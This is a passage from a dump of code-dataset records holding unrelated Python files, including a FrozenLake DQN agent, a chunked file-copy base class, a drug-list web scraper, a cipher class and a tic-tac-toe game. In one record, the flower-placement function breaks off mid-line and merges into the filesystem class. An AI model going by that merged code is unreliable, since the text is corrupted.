print(os_exists(\"/Users/lishaoxu/Desktop/嵌入式.jpg\"))\n","sub_path":"client/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"568524932","text":"# AI for FrozenLake\n# Inspired in code from AI from A-Z\n\n# Importing the libraries\n\nimport numpy as np\nimport random\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.autograd as autograd\nfrom torch.autograd import Variable\n\n#from fl_mapLoader import Game\n\n# Creating the architecture of the Neural Network\n\nclass Network(nn.Module):\n\n def __init__(self, input_size, nb_action):\n super(Network, self).__init__()\n self.input_size = input_size\n self.nb_action = nb_action\n self.fc1 = nn.Linear(input_size, 30)\n self.fc2 = nn.Linear(30, nb_action)\n\n def forward(self, state):\n x = F.relu(self.fc1(state))\n q_values = self.fc2(x)\n return q_values\n\n# Implementing Experience Replay\n\nclass ReplayMemory(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n\n def push(self, event):\n self.memory.append(event)\n if len(self.memory) > self.capacity:\n del self.memory[0]\n\n def sample(self, batch_size):\n samples = zip(*random.sample(self.memory, batch_size))\n return map(lambda x: Variable(torch.cat(x, 0)), samples)\n\nclass Dqn():\n\n\t# Create and initialize all needed variables\n def __init__(self, input_size, nb_action, gamma):\n self.gamma = gamma\t# Gamma = Discount factor\n self.reward_window = []\n self.model = Network(input_size, nb_action) # Creates the object of the network class\n self.memory = ReplayMemory(100000) # Object of memory with capacity = 100000\n self.optimizer = optim.Adam(self.model.parameters(), lr = 0.01) # Creates object from torch.optim as optimizer with the parameters from the model and learning rate = 0.001\n self.last_state = torch.Tensor(input_size).unsqueeze(0) # Creates a batch to input in the NN with the variables of the state and a fake dimension in position 0 corresponding to the batch\n self.last_action = 0 # {0,1,2,3}\n self.last_reward = 0 # [-1,0,+1]\n\n # This probably needs to be changed so it selects an action from the possible pool\n def select_action(self, state):\n ## Seleccionar aqui tambien si accion aleatoria o utilizar red neuronal\n probs = F.softmax(self.model(Variable(state, volatile = True))*100) # T=100 (temperature parameter)\n action = probs.multinomial(num_samples=1) # Returns a random action from the possible actions based on a multinomial distribution\n return action.data[0,0] # The action is contained in index [0,0] of the data\n\n\t# This method implements Deep Q-Learning process represented in Handbook - Chapter 5.3\n def learn(self, batch_state, batch_next_state, batch_reward, batch_action): # (dqn object, current state, next state, reward, performed action) ## MARKOV DECISION PROCESS\n outputs = self.model(batch_state).gather(1, batch_action.unsqueeze(1)).squeeze(1) #gather returns the best action to play for each of the input states\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t #batch_action.unsqueeze(1) to make it consistent with batch_state\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t #.squeeze(1) kills the fake dimension since we don't need the batch anymore outside the neural network\n next_outputs = self.model(batch_next_state).detach().max(1)[0]\n target = self.gamma*next_outputs + batch_reward\t# Target Q-Value.\n td_loss = F.smooth_l1_loss(outputs, target) # Inputs predictions and targets to loss function to compare results\n self.optimizer.zero_grad() # Reinitializes optimizer to a gradient = 0\n td_loss.backward() # Backpropagation\n self.optimizer.step() # Updates the weights of the NN\n\n def update(self, state):\n new_state = torch.Tensor(state).float().unsqueeze(0) # Converts the signals of our three sensors into a Torch tensor with floating comma\n self.memory.push((self.last_state, new_state, torch.LongTensor([int(self.last_action)]), torch.Tensor([self.last_reward]))) # Updates the memory with the transition event, containing last state, new state, last action played and the last reward\n action = self.select_action(new_state)\n if len(self.memory.memory) > 100: # Comprueba si la memoria tiene suficientes muestras como para aprender y elige 100 muestras\n batch_state, batch_next_state, batch_action, batch_reward = self.memory.sample(100) # Creates batches of parameters from randomly selected performed actions in memory\n self.learn(batch_state, batch_next_state, batch_reward, batch_action)\n\n self.last_action, self.last_reward, self.done, _ = game.perform_action(action)\n #self.last_action = action\n #self.last_state = new_state\n #self.last_reward = reward\n self.reward_window.append(self.last_reward)\n if len(self.reward_window) > 1000:\n del self.reward_window[0]\n return action\n\n def score(self): # Computes the mean of the rewards in the reward window\n return sum(self.reward_window)/(len(self.reward_window)+1.)\n","sub_path":"scripts/OpenAI-Gym/FrozenLake/.ipynb_checkpoints/ai_frozen-checkpoint.py","file_name":"ai_frozen-checkpoint.py","file_ext":"py","file_size_in_byte":5060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"541872043","text":"import math\n# place 1 in 0,1 sequence s.t. 1's are not adjacent\n# check if place n 1's is possible\n# => place 1's in continue 0's\n# => 3 cases, suppose we have k 0's: \n# 1,one end:0...1, just like case3, with k-1 0's\n# 2,two end:1...0...1, just like case3, with k-2 0's\n# 3,no end:0...0\n# max 1's can be placed- 3:ceil[k/2]\n# def can_place_flower(bit_map, n):\n\t# read all the 0's segments\n\t# if sum(above_segment) == len(bit_map), use case3, else\n\t# calculate case2 segments\n\t# check if 1st is 0, last is 0 to determine if we need case2\n\t# max_1s = 0\n\t# zero_segs = []\n\t# zero_seg = 0\n\t# all_zeros = True\n\t# for index,bit in enumerate(bit_map):\n\t# \tif bit==1:\n\t# \t\tall_zeros = False\n\t# \tif bit==1 or index==len(bit_map)-1:\n\t# \t\tif zero_seg>0:\n\t# \t\t\tzero_segs.add(zero_seg)\n\t# \t\tzero_seg = 0\n\t# \telse:\n\t# \t\tzero_seg = zero_seg + 1\n\n\t# if all_zeros:\n\t# \treturn math.ceil(n/2)>=n\n\t# if len(zero_segs)==0:\n\t# \treturn n==0\n\n\t# for case2_seg in zero_segs[1:-1]:\n\t# \tmax_1s = max_1s + math.ceil( (case2_seg-2)/2 )\n\n\t# if bit_map[0]==0:\n\t# \tmax_1s = max_1s + math.ceil( (zero_segs[0]-1)/2 )\n\t# else:\n\t# \tmax_1s = max_1s + math.ceil( (zero_segs[0]-2)/2 )\n\n\t# if bit_map[-1]==0:\n\t# \tmax_1s = max_1s + math.ceil( (zero_segs[-1]-1)/2 )\n\t# else:\n\t# \tmax_1s = max_1s + math.ceil( (zero_segs[-1]-2)/2 )\n\n\t# return max_1s>=n\n\n\n# another approach, read 2 bits at one time 10,01,00,11 4 cases\n# then modify bit map (add constraints) when scanning\n# 00=>01? not sure\n# another approach, when dicide to change 0 to 1, look left & right bit\ndef can_place_flower(bit_map, n):\n\tmax_counter = 0\n\tfor ind,bit in enumerate(bit_map):\n\t\tleft_can_flip = ind==0 or bit_map[ind-1]==0\n\t\tright_can_flip = ind==len(bit_map)-1 or bit_map[ind+1]==0\n\t\tcan_flip = left_can_flip and right_can_flip and bit==0\n\t\tif can_flip:\n\t\t\tbit_map[ind] = 1\n\t\t\tmax_counter = max_counter + 1\n\treturn n %s\" % (src.abspath, dst.abspath))\n\n # TODO: There must be a better way to do this, but type(src) == type(dst) does not work\n if src.__class__.__name__ == dst.__class__.__name__:\n self.local_mv_file(src, dst)\n else:\n self.cp_file(src, dst, dstFs)\n self.delete_file_dir(src)\n\n @RetryAndCatch(Errors.FsException, 10, 10, doubling_backoff)\n def cp_chunk(self, src, dst, dstFs, srcOffset, dstOffset, lastChunk, dstWriteMode):\n size = Constants.DEFAULT_BIG_FILE_THRESHOLD - srcOffset % Constants.DEFAULT_BIG_FILE_THRESHOLD\n if lastChunk:\n size = src.size - srcOffset\n\n progressFormatString = \"({0:>13,}/{1:>13,}) bytes\"\n sizeWritten = 0\n \n with FileOpen(self, src, True, \"rb\", srcOffset, size) as srcCopy:\n with FileOpen(dstFs, dst, False, dstWriteMode, dstOffset, dstOffset) as dstCopy:\n for batch in srcCopy:\n if self.verbose and is_normal_stdout():\n sizeWritten += len(batch)\n progressString = progressFormatString.format(sizeWritten, size)\n sys.stdout.write(progressString)\n sys.stdout.write(\"\\b\" * len(progressString))\n sys.stdout.flush()\n dstFs.append_data(dstCopy, batch)\n\n @RetryAndCatch(Errors.FsException, 5, 10)\n def make_fd_retriable(self, path, isSrc, dstDirMustExist):\n return self.make_fd(path, isSrc, dstDirMustExist)\n \n @RetryAndCatch(Errors.FsException, 5, 10, doubling_backoff)\n def concat_chunk_files(self, fs, fileName, chunkList):\n if chunkList:\n fs.touch_file(fileName)\n fs.try_concat_files(fileName, chunkList)\n\n def remote_cp_file(self, src, dst, dstFs):\n dstChunkList = None\n\n # Step 1: Perform a copy\n progressString = \"- Progress: \"\n self.logger.info(\"REMOTE COPY ({0}): {1} -> {2}\".format(src.size, src.abspath, dst.abspath))\n if src.size <= Constants.DEFAULT_BIG_FILE_THRESHOLD:\n if self.verbose and is_normal_stdout():\n sys.stdout.write(progressString)\n sys.stdout.flush()\n if dst.exists:\n dstFs.delete_file_dir(dst)\n dstFs.touch_file(dst)\n\n self.cp_chunk(src, dst, dstFs, 0, 0, True, \"wb\")\n else:\n chunk = 0\n offset = 0\n chunkSize = Constants.DEFAULT_BIG_FILE_THRESHOLD\n numChunks = (src.size / chunkSize) + 1\n dstChunkList = list()\n while offset < src.size:\n dstChunk = dstFs.make_fd_retriable(\n dst.abspath + \".__chunk__\" + str(chunk),\n isSrc=False,\n dstDirMustExist=True)\n \n dstChunkList.append(dstChunk)\n self.logger.info(\"BIG COPY: chunk={0}, dst={1}\".format(chunk, dstChunk.abspath))\n\n if dstChunk.exists:\n dstFs.delete_file_dir(dstChunk)\n dstFs.touch_file(dstChunk)\n \n if dstChunk.size == Constants.DEFAULT_BIG_FILE_THRESHOLD \\\n and src.modificationTime <= dstChunk.modificationTime:\n if self.verbose:\n print(\"%s -> %s: skipped\" % (src.abspath, dstChunk.abspath))\n elif dstChunk.size > Constants.DEFAULT_BIG_FILE_THRESHOLD:\n errMsg = \"a chunk: {0} has its size bigger than max size, you need remove it before next retry\".format(dstChunk.abspath)\n self.logger.error(errMsg)\n raise Errors.FsException(errMsg)\n else:\n if self.verbose:\n print(\"%s -> %s\" % (src.abspath, dstChunk.abspath))\n if is_normal_stdout():\n progressFormatString = \"Chunk ({0}/{1}) - \"\n progressString += progressFormatString.format(chunk + 1, numChunks)\n sys.stdout.write(progressString)\n sys.stdout.flush()\n self.cp_chunk(src, dstChunk, dstFs, offset+dstChunk.size, dstChunk.size, chunk == numChunks -1, \"ab\")\n if self.verbose and is_normal_stdout():\n sys.stdout.write(\"\\r\")\n sys.stdout.flush()\n chunk += 1\n offset = chunk * chunkSize\n \n # Step2: concat all chunk files into final file\n self.concat_chunk_files(dstFs, dst, dstChunkList)\n\n def cp_file(self, src, dst, dstFs, force):\n self.logger.info(\"COPY: from({0})={1} to({2})={3}\".format(src.fs.__class__.__name__,\n src.abspath,\n dst.fs.__class__.__name__,\n dst.abspath))\n if dst.is_directory:\n newPath = self.path_join(dst.abspath, src.name)\n newDst = dstFs.make_fd(path=newPath, isSrc=False, dstDirMustExist=True)\n self.logger.info(\"COPY TARGET: change from {0} to {1}\".format(dst.abspath, newDst.abspath))\n dst = newDst\n\n if dst.exists and not force:\n if self.verbose:\n print(\"Destination already exists, move will not be performed. Add -f to force copy\" % (dst.abspath))\n return\n else:\n if self.verbose:\n print(\"%s -> %s\" % (src.abspath, dst.abspath))\n\n startTime = time.time()\n\n # TODO: There must be a better way to do this, but type(src) == type(dst) does not work\n if src.__class__.__name__ == dst.__class__.__name__:\n # This is purely a performance optimization, the code below will\n # perform a deep copy which is just as good\n self.logger.info(\"LOCAL COPY: {0} -> {1}\".format(src.abspath, dst.abspath))\n self.local_cp_file(src, dst)\n else:\n self.remote_cp_file(src, dst, dstFs)\n\n endTime = time.time()\n\n dst = dstFs.make_fd_retriable(dst.abspath, False, True)\n if src.size != dst.size:\n raise ValueError(\"Size mismatch, %s size %d, %s size %d\" % (src.abspath, src.size, dst.abspath, dst.size))\n\n self.bytesCopied += src.size\n self.copyTime += endTime - startTime\n\n def compute_hash(self, fd):\n chunk = 0\n offset = 0\n hashList = list()\n while offset < fd.size:\n hasher = hashlib.sha1()\n size = min(Constants.DEFAULT_BIG_FILE_THRESHOLD, fd.size - offset)\n with FileOpen(self, fd, True, \"rb\", offset, size) as srcCopy:\n for batch in srcCopy:\n hasher.update(batch)\n\n currHash = str(hasher.hexdigest())\n self.logger.debug(\"HASH for {0}, {1}-{2}: {3}\".format(fd.abspath, offset, offset + size, currHash))\n hashList.append(currHash)\n chunk += 1\n offset = chunk*Constants.DEFAULT_BIG_FILE_THRESHOLD\n\n hasher = hashlib.sha1()\n\n for subHash in hashList:\n hasher.update(subHash.encode(\"utf-8\"))\n\n print(\"Hash for file {0} is {1}\".format(fd.abspath, str(hasher.hexdigest())))\n\n def walk(self, fd):\n # Not able to use os.walk in local case as it is too slow for large directories\n workList = list()\n workList.append(fd)\n while len(workList) > 0:\n currDir = workList.pop(0)\n fileList = list()\n dirList = list()\n try:\n for item in self.list_dir(currDir):\n if item.is_directory:\n workList.append(item)\n dirList.append(item)\n elif item.is_file or item.is_symlink:\n fileList.append(item)\n except Errors.Unauthorized:\n print(\"Insufficient privileges to access the path: %s\" % currDir.abspath)\n\n yield currDir, dirList, fileList\n\n def fast_walk(self, fd):\n # Not able to use os.walk in local case as it is too slow for large directories\n workList = list()\n workList.append(fd)\n currDir = None\n while len(workList) > 0:\n prevDir = currDir\n currDir = workList.pop(0)\n try:\n for item in self.list_dir(currDir):\n if item.is_directory:\n workList.append(item)\n elif item.is_file or item.is_symlink:\n yield prevDir != currDir, currDir, item\n except Errors.Unauthorized:\n print(\"Insufficient privileges to access the path: %s\" % currDir.abspath)\n\n def read_chunk(self, srcFile, offset, size, chunkSize=Constants.DEFAULT_COPY_CHUNK_SIZE):\n sizeLeftToRead = size\n while sizeLeftToRead != 0:\n startTime = time.time()\n data = self.read_data(srcFile, offset, chunkSize)\n elapsedTime = time.time() - startTime\n sizeRead = len(data)\n self.logger.debug(\"Read: {0:,} bytes in {1} secs, copy rate {2:,} bytes/sec\".format(\n sizeRead, elapsedTime, sizeRead/elapsedTime))\n sizeLeftToRead -= sizeRead\n assert sizeLeftToRead >= 0\n offset += sizeRead\n yield data\n\n def make_fd(self, path, isSrc, dstDirMustExist):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def exists_file_dir(self, fd):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def delete_file_dir(self, fd, recursive, force):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def list_dir(self, fd):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def make_dir(self, path):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def open_file(self, fd, rwMode):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def close_file(self, fd):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def touch_file(self, fd):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def truncate_file(self, fd, size):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def try_concat_files(self, fd, chunkFdList):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def concat_files(self, fd, chunkFdList):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def read_data(self, fd, offset, size):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def append_data(self, fd, data):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def local_mv_file(self, src, dst):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n\n def local_cp_file(self, src, dst):\n raise NotImplementedError(\"This function must be implemented by the FS class that extends base FS\")\n","sub_path":"pai-fs/fsimpl/BaseFs.py","file_name":"BaseFs.py","file_ext":"py","file_size_in_byte":17071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"496134006","text":"from bs4 import BeautifulSoup\nimport urllib.request\nfrom collections import defaultdict\n\nurl='https://www.drugs.com/drug_information.html'\n\nfrom urllib.request import Request, urlopen\n\nreq = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\nurl_f= urlopen(req).read()\n\nsoup=BeautifulSoup(url_f,'html.parser')\n\nlinks={}\ndrugs={}\ndrugs=defaultdict(dict)\n\nlist1= soup.find_all('ul',{'class':'ddc-paging'})\n#print(list1, end=\"\\n \")\n\nfor i in list1:\n per_drugs=i.find_all('a')\n#print(per_drugs, end=\" \\n\")\nfor link in per_drugs:\n links[str(link.string)]=str(link.get('href'))\n#print(links, end=\"\\n\")\n\n#for x,y in links.items():\n # print(const+y,x)\n\nconst='https://www.drugs.com'\n\ndef func(website,char):\n #print(char)\n req_1 = Request(website, headers={'User-Agent': 'Mozilla/5.0'})\n url_f_1= urlopen(req_1).read()\n soup_1=BeautifulSoup(url_f_1,'html.parser')\n\n list_1= soup_1.find_all('ul',{'class':'ddc-list-column-2'})\n \n for j in list_1:\n per_drugs_1=j.find_all('a')\n #print(per_drugs_1,end=\"\\n\")\n m=1\n for drug in per_drugs_1:\n \n drugs[str(char)][m]=str(drug.string)\n m=m+1\n \n \n\nfor x,y in links.items():\n func(const+y,x)\n\n#print(drugs,end=\"\\n\")\n\n\nq=input(\"enter letter \")\n\nprint(drugs[q])\n","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"32956933","text":"import os\nimport re\nengine_name = 'OurLibrary'\nengine_dir= engine_name + '/'\n\nextensions=['.cpp', '.hpp', '.h']\nsrc_files = []\nfor root, dirs, files in os.walk(engine_dir):\n for file in files:\n for ext in extensions:\n if file.endswith(ext):\n path = os.path.join(root, file)\n path = path.replace(engine_dir, '')\n path = path.replace('\\\\', '/')\n src_files.append(path)\n print(os.path.join(root, file), '=>', path)\n\n\nammend_data = 'add_library(\\n\\t' + engine_name + ' SHARED \\n\\t'\nfor file in src_files:\n ammend_data = ammend_data + file + '\\n\\t'\n\nprint(ammend_data)\n\ncmake_file = open(engine_dir + 'CMakeLists.txt')\ndata = cmake_file.read();\n#data = data.replace('add_library([^)]*)', 'add_library(sup)')\ndata = re.sub('add_library([^)]*)', ammend_data, data, count = 1, flags = re.DOTALL)\n\ncmake_file = open(engine_dir + 'CMakeLists.txt', 'w')\ncmake_file.write(data)\nprint(data)","sub_path":"populate_cmake_src_deps.py","file_name":"populate_cmake_src_deps.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"456626067","text":"from random import randint\nimport string\n\nALPHABET = string.ascii_lowercase\n\nclass Cypher:\n \n def __init__(self, map = (lambda a: a)):\n if isinstance(map, dict):\n self._cyphermap = map\n self._decyphermap = dict()\n for key in map:\n self._decyphermap[map[key]] = key\n elif callable(map):\n self._cyphermap = dict()\n self._decyphermap = dict()\n for ltr in ALPHABET:\n self._cyphermap[ltr] = map(ltr)\n self._decyphermap[map(ltr)] = ltr\n else:\n assert False, \"map in Cypher initializer should be a function or a dictionary\"\n\n def copy(self):\n cyphermap_copy = self._cyphermap.copy()\n to_return = Cypher(cyphermap_copy)\n return to_return\n\n #infer_cypher chooses a random word from words and forces the cypher to decrypt encrypted_word to that word\n @staticmethod\n def infer_cypher(encrypted_word, words):\n assert isinstance(encrypted_word, str), \"infer_cypher() takes a string.\"\n\n def cypher_match(encrypted_word, words):\n\n def get_pattern(word):\n assert isinstance(word, str), \"get_pattern() takes a string.\"\n pattern = {}\n for i in range(len(word)):\n if (word.find(word[i]) in pattern.keys()):\n pattern[word.find(word[i])].append(i)\n else:\n pattern[i] = [i]\n\n return pattern\n\n assert isinstance(encrypted_word, str), \"cypher_match() takes a string.\"\n assert type(words) == type(list()), \"words should be a list of strings.\"\n to_return = []\n pattern = get_pattern(encrypted_word)\n for word in words:\n assert isinstance(word, str), \"words should be a list of strings.\"\n if get_pattern(word) == pattern:\n to_return.append(word)\n\n return to_return\n \n matches = []\n while (len(matches) == 0):\n matches = cypher_match(encrypted_word, words)\n \n match = matches[randint(0, len(matches) - 1)]\n map = {}\n for i in range(0, len(encrypted_word)):\n assert len(encrypted_word) == len(match), \"encrypted_word and match should be the same length.\"\n map[match[i]] = encrypted_word[i]\n \n to_return = Cypher(map)\n to_return.shuffle_unmapped();\n return to_return\n\n\n def encrypt(self, str):\n to_return = \"\"\n for s in str:\n if s in self._cyphermap:\n to_return = to_return + self._cyphermap[s]\n else:\n to_return = to_return + s\n\n return to_return\n\n def decrypt(self, str):\n to_return = \"\"\n for s in str:\n if s in self._decyphermap:\n to_return = to_return + self._decyphermap[s]\n else:\n to_return = to_return + s\n return to_return\n \n def shuffle_unmapped(self):\n\n remaining_keys = ALPHABET[:]\n \n remaining_values = ALPHABET[:]\n for key in self._cyphermap.keys():\n remaining_keys.replace(key, \"\")\n remaining_values.replace(self._cyphermap[key], \"\")\n \n keyidx = 0\n while len(remaining_values) > 0:\n index = randint(0, len(remaining_values) - 1)\n result = remaining_values[index]\n if index == len(remaining_values) - 1:\n remaining_values = remaining_values[:index]\n else:\n remaining_values = remaining_values[:index] + remaining_values[index + 1:]\n self._cyphermap[remaining_keys[keyidx]] = result\n self._decyphermap[result] = remaining_keys[keyidx]\n keyidx = keyidx + 1\n\n \n def shuffle_map(self):\n self._cyphermap = {}\n self._decyphermap = {}\n self.shuffle_unmapped()\n\n def swap(self, key1, key2):\n \n val1 = self._cyphermap[key1]\n val2 = self._cyphermap[key2]\n\n self._cyphermap[key1] = val2\n self._cyphermap[key2] = val1\n\n self._decyphermap[val2] = key1\n self._decyphermap[val1] = key2\n\n \n","sub_path":"cypher.py","file_name":"cypher.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"135543532","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 3 10:27:50 2018\n\n@author: James Jiang\n\"\"\"\n\nall_lines = [line.rstrip('\\n') for line in open('Data.txt')]\n\nvowels = [char for char in 'aeiou']\nillegals = ['ab', 'cd', 'pq', 'xy']\n\ndef is_nice(string):\n for illegal in illegals:\n if illegal in string:\n return False\n else:\n vowel_count = 0\n double_count = 0\n for i in range(len(string) - 1):\n if string[i] in vowels:\n vowel_count += 1\n if string[i] == string[i + 1]:\n double_count += 1\n if string[-1] in vowels:\n vowel_count += 1\n if vowel_count < 3:\n return False\n elif double_count == 0:\n return False\n else:\n return True\n\ncount = 0 \nfor string in all_lines:\n if is_nice(string) == True:\n count += 1\n \nprint(count)\n","sub_path":"python/2015day5part1.py","file_name":"2015day5part1.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"642127451","text":"# Tic tac toe Project\nimport random\nname = input(\"Enter your name: \")\ngame_input = ['Null','x','o','x','o','x','o','x','o','x']\ndef board(game_input):\n\tprint(game_input[7]+'|'+game_input[8]+'|'+game_input[9])\n\tprint(game_input[4]+'|'+game_input[5]+'|'+game_input[6])\n\tprint(game_input[1]+'|'+game_input[2]+'|'+game_input[3])\n\n#print(board(game_input))\n\ndef player_input():\n\tmarker = input(f\"Dear {name}! Choose your marker either 'x' or 'o':\")\n\twhile marker != 'x' and marker != 'o':\n\t\tmarker = input(\"Choose your marker again: \")\n\tif marker == 'x':\n\t\treturn ('x ','o ')\n\telse:\n\t\treturn('o ','x ')\n#Put the marker on board\ndef put_marker(game_input,marker,position):\n\tgame_input[position] = marker\n\n\n#Criteria to check if the player has won or not\ndef win(game_input,marker):\n\treturn ((game_input[7] == game_input[8] == game_input[9] == marker) or\n\t\t\t(game_input[4] == game_input[5] == game_input[6] == marker) or\n \t\t(game_input[7] == game_input[4] == game_input[1] == marker) or\n\t\t\t(game_input[8] == game_input[5] == game_input[2] == marker) or\n \t\t(game_input[9] == game_input[6] == game_input[3] == marker) or\n \t\t(game_input[1] == game_input[5] == game_input[9] == marker) or\n\t\t\t(game_input[7] == game_input[5] == game_input[3] == marker))\n \n#print(win(game_input,'o'))\n#choose player using random function\ndef choose_player():\n\tplayer = random.randint(1,2)\n\tif player == 1:\n\t\treturn 'Player_1'\n\telse:\n\t\treturn 'Player_2'\n#checking empty space\ndef space(game_input,position):\n\treturn game_input[position] == ' '\n#checking full board for empty space\ndef full_board_check(game_input):\n\tfor i in range(1,10):\n\t\tif space(game_input,i):\n\t\t\treturn False\n\t\treturn True\n#player Choice marker Placement\ndef player_choice(game_input):\n\tposition = 0\n\twhile position not in [1,2,3,4,5,6,7,8,9] or not space(game_input,position):\n\t\tposition = int(input(\"Please choose your position (1-9) on num-pad: \"))\n\treturn position\n#Would u like to play again\ndef play_again():\n\tchoice = input(\"Would you like to play again [y/x]\")\n\treturn choice == 'y'\n\n#Game mechanism\nwhile True:\n\tthe_board = [' ']*10\n\tplayer_1,player_2 = player_input()\n\tprint(player_1 + 'is player_1 sign')\n\tprint(player_2 + 'is player_2 sign')\n\tturn = choose_player()\n\tprint(turn + \"will play first\")\n\tplay_game = input(\"Are you ready to play[y/n]\")\n\tif play_game == 'y':\n\t\tgame_on = True\n\telse:\n\t\tgame_on = False\n\twhile game_on:\n\t\tif turn == 'player_1':\n\t\t\tboard(the_board)\n\t\t\tposition = player_choice(the_board)\n\t\t\tput_marker(the_board,player_1,position)\n\t\t\tif win(the_board,player_1):\n\t\t\t\tboard(the_board)\n\t\t\t\tprint(\"Player1 has won\")\n\t\t\t\tgame_on = False\n\t\t\telse:\n\t\t\t\tif full_board_check(the_board):\n\t\t\t\t\tboard(the_board)\n\t\t\t\t\tprint(\"Game tie\")\n\t\t\t\t\tgame_on = False\n\t\t\t\telse:\n\t\t\t\t\tturn = 'player_2'\n\t\telse:\n\t\t\tboard(the_board)\n\t\t\tposition = player_choice(the_board)\n\t\t\tput_marker(the_board,player_2,position)\n\t\t\tif win(the_board,player_2):\n\t\t\t\tboard(the_board)\n\t\t\t\tprint(\"Player2 has won\")\n\t\t\t\tgame_on = False\n\t\t\telse:\n\t\t\t\tif full_board_check(the_board):\n\t\t\t\t\tboard(the_board)\n\t\t\t\t\tprint(\"Game tie\")\n\t\t\t\t\tgame_on = False\n\t\t\t\telse:\n\t\t\t\t\tturn = 'player_1'\n\n# Check weatherr the player wants to paly again or not\n\tif not play_again():\n\t\tbreak;\n","sub_path":"Project_One_Tic_Tac_Toe/Tic_tac_toe.py","file_name":"Tic_tac_toe.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"307606944","text":"import keyboard\r\nimport pygame\r\nimport os\r\nimport json\r\n\r\n\r\ndef get_sounds(s, k):\r\n s[k].play()\r\n\r\n\r\npygame.mixer.pre_init(44100, 16, 2, 4096)\r\npygame.mixer.init()\r\npygame.mixer.music.set_volume(0.5)\r\n\r\ndirectory_path = os.path.join(os.path.abspath('..'), 'sounds')\r\n\r\nsounds = {}\r\nkey_map = json.load(open(os.path.join(directory_path, 'sounds.json')))\r\nfor key, path in key_map.items():\r\n sounds[key] = pygame.mixer.Sound(os.path.join(directory_path, key_map[key]))\r\n keyboard.add_hotkey(key, get_sounds, (sounds, key, ))\r\n\r\nkeyboard.wait('esc')\r\n","sub_path":"src/keyboard_sound_json.py","file_name":"keyboard_sound_json.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"102066000","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2021, Jigar Tarpara and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom erpnext.hr.utils import update_employee\n\n\nclass EmployeeRejoin(Document):\n def on_submit(self):\n employee = frappe.get_doc(\"Employee\", self.employee)\n employee = update_employee(\n employee, self.employee_rejoin_detail, date=employee.date_of_joining)\n for row in employee.internal_work_history:\n row.to_date = employee.relieving_date\n employee.save()\n frappe.db.set_value(\"Employee\", self.employee,\n 'date_of_joining', self.rejoin_date)\n\n def on_cancel(self):\n employee = frappe.get_doc(\"Employee\", self.employee)\n employee = update_employee(\n employee, self.employee_rejoin_detail, cancel=True)\n employee.save()\n","sub_path":"pni_customization/pni_customization/doctype/employee_rejoin/employee_rejoin.py","file_name":"employee_rejoin.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"9240451","text":"import pandas as pd\nimport numpy as np\nimport folium\nimport json\nimport gmsxfr\nimport os\nimport argparse\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--gams_sysdir\", dest=\"gams_sysdir\", default=None, type=str)\n parser.add_argument(\"--data_repo\", dest=\"data_repo\", default=None, type=str)\n parser.add_argument(\"--output\", dest=\"output\", default=None, type=str)\n parser.add_argument(\"--data_dir\", dest=\"data_dir\", default=None, type=str)\n\n # parser.set_defaults(gams_sysdir=\"some path here\")\n # parser.set_defaults(data_repo=\"some path here\")\n # parser.set_defaults(data_dir=\"some path here\")\n\n args = parser.parse_args()\n\n #\n #\n # get network data\n gdx = gmsxfr.GdxContainer(\n args.gams_sysdir, os.path.join(args.data_repo, \"processed_werewolf_data.gdx\")\n )\n gdx.rgdx([\"lat\", \"lng\", \"map_aggr\"])\n\n lat = gdx.to_dict(\"lat\")\n lng = gdx.to_dict(\"lng\")\n map_aggr = gdx.to_dataframe(\"map_aggr\")\n\n gdx = gmsxfr.GdxContainer(\n args.gams_sysdir, os.path.join(args.data_repo, \"network_arcs.gdx\")\n )\n 